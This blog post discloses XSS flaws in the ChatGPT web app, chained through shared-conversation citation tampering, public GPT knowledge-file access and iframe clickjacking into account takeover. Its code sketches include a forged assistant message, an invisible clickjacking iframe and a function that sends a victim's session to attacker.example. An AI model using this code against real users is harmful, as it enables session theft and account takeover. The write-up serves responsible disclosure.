With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information.
In this blog post, I'll walk you through my discovery of two cross-site scripting (XSS) vulnerabilities in ChatGPT, along with a few other issues I found along the way.
Digging into ChatGPT

My journey began with examining ChatGPT's tech stack.
ChatGPT lets users upload files and ask questions about them.
When answering, ChatGPT may quote these files and include a clickable citation icon that takes you back to the original file or website for reference.
The first XSS I found lives in this citation flow. Exploiting it requires the victim to upload a malicious file and then interact with ChatGPT in a way that prompts it to quote from that file. The victim also needs to click the citation to trigger the XSS - on its own, a self-XSS. I therefore looked into ChatGPT's feature for sharing conversations as a possible way to make this exploit shareable.
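Before following that thread, it helps to see why clicking a citation can execute the file at all. The sketch below is a hypothetical reconstruction of the vulnerable click handler, inferred from the fix OpenAI later shipped (removing the blob creation); every function and variable name here is an assumption, not ChatGPT's actual source.

```typescript
// Hypothetical reconstruction of the vulnerable citation-click handler.
// Names are assumed; the blob-based flow is inferred from the later fix.
async function openCitation(fileDownloadUrl: string): Promise<void> {
  const response = await fetch(fileDownloadUrl);
  const fileContent = await response.text();

  // Wrapping attacker-controlled bytes in a blob: URL mints a document
  // on ChatGPT's own origin; if the content is treated as HTML, any
  // <script> inside it executes with that origin when the tab opens.
  const blob = new Blob([fileContent], { type: "text/html" });
  window.open(URL.createObjectURL(blob));
}
```

In other words, if the cited file contains HTML with a script tag, the payload runs in the context of the ChatGPT origin rather than being downloaded inertly.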
Files uploaded in a ChatGPT conversation are accessible only to the account that uploaded them.
Attempts to access these files from another account resulted in a 404 error.
Through my exploration, I discovered that when a GPT is set to public, any account can access and download its knowledge files, as long as it has the necessary information: the GPT ID and the associated file ID. I considered this a Broken Function Level Authorization (BFLA) bug, since it allows any ChatGPT user to download the knowledge files of any public GPT.
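A minimal sketch of the download, assuming a hypothetical endpoint shape (the exact path is illustrative, not OpenAI's documented API):

```typescript
// Sketch of the BFLA issue: any logged-in ChatGPT account can pull a
// public GPT's knowledge file given the GPT ID and file ID. The endpoint
// path below is a hypothetical shape, for illustration only.
const GPT_ID = "g-XXXXXXXXXX";   // public GPT identifier (placeholder)
const FILE_ID = "file-XXXXXXXX"; // knowledge file identifier (placeholder)

async function downloadKnowledgeFile(): Promise<string> {
  const res = await fetch(
    `https://chat.openai.com/backend-api/gizmos/${GPT_ID}/files/${FILE_ID}/download`,
    { credentials: "include" } // any session works, not just the uploader's
  );
  if (!res.ok) throw new Error(`unexpected status: ${res.status}`);
  return res.text();
}
```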
If I could make the shared conversation request a public GPT knowledge file instead of the original uploaded file, the XSS vulnerability would become exploitable against other accounts.
To my surprise, ChatGPT accepted this change and continued to render the responses as if they had come from the assistant.
In this context, I could use input data to manipulate aspects of the ChatGPT application - specifically, the citation metadata - in ways that should ordinarily be off-limits to a regular user.
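To make this concrete, here is an illustrative shape of the tampered data in the share-conversation request. Every field name below is an assumption; the point is that citation metadata normally produced server-side can be supplied by the attacker and pointed at a public GPT knowledge file.

```typescript
// Illustrative (assumed) shape of a forged message in the share request.
const forgedMessage = {
  author: { role: "assistant" }, // presented as model output
  content: "As stated in the uploaded report [1] ...",
  metadata: {
    citations: [
      {
        gizmo_id: "g-XXXXXXXXXX", // attacker's public GPT (placeholder)
        file_id: "file-XXXXXXXX", // its knowledge file (placeholder)
        title: "report.html",     // the file carrying the XSS payload
      },
    ],
  },
};
```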
I created and shared a conversation, and when I tested it with another ChatGPT account, clicking any citation in the conversation downloaded the knowledge file from my public GPT and triggered the XSS. I reported this vulnerability to OpenAI, who responded by removing the blob creation and changing the logic to open the download URL directly.
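In sketch form, the patched behavior reduces to navigating straight to the download URL, so no attacker-controlled bytes are ever minted onto ChatGPT's origin (again, a sketch of the fix as described, not the actual source):

```typescript
// Sketch of the patched handler: no blob: URL is created, so the file
// is fetched from its own download origin instead of executing locally.
function openCitationFixed(fileDownloadUrl: string): void {
  window.open(fileDownloadUrl);
}
```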
I then broadened my investigation to how ChatGPT handles the rendering of citations from websites.
ChatGPT allows its interface to be embedded in other websites using an `iframe`.
In my proof of concept, I embedded the shared ChatGPT conversation within an `iframe` and used CSS to position it so that any click would inadvertently trigger the citation link.
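A minimal clickjacking sketch of that setup, assuming a shared-conversation URL (the conversation ID is a placeholder):

```typescript
// Oversize, offset, and nearly transparent iframe so that a click
// anywhere on the attacker's page lands on the citation link.
const frame = document.createElement("iframe");
frame.src = "https://chat.openai.com/share/<conversation-id>"; // placeholder
Object.assign(frame.style, {
  position: "fixed",
  top: "-200px",     // offsets chosen so the citation sits under the bait
  left: "-300px",
  width: "2000px",
  height: "2000px",
  opacity: "0.0001", // effectively invisible, but still clickable
  border: "0",
  zIndex: "9999",
});
document.body.appendChild(frame);
```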
In our scenario, when a user visited our malicious site embedding an iframe that pointed to our shared ChatGPT conversation, browser protections against third-party cookies and storage would block access to the ChatGPT session cookie and LocalStorage, effectively logging the victim out of their account within the iframe.
Because the embedded conversation itself is served from ChatGPT's origin, however, a request to openai.com from script running inside the iframe was considered a same-origin request, and thus not subject to the typical cross-origin restrictions - ultimately enabling the takeover of any ChatGPT account.
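To illustrate the impact once script executes with ChatGPT's origin, a payload could read session state and ship it to an attacker-controlled server. The session endpoint below is based on the web app's publicly observable behavior and should be treated as illustrative; the collector URL is, of course, hypothetical.

```typescript
// Sketch of session exfiltration from a same-origin execution context.
async function exfiltrateSession(): Promise<void> {
  const res = await fetch("https://chat.openai.com/api/auth/session", {
    credentials: "include", // first-party cookies are attached here
  });
  const session = await res.json();

  // Ship the stolen session to a hypothetical attacker collector.
  await fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(session),
  });
}
```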
It's rewarding to know that our efforts have made ChatGPT more secure for all its users.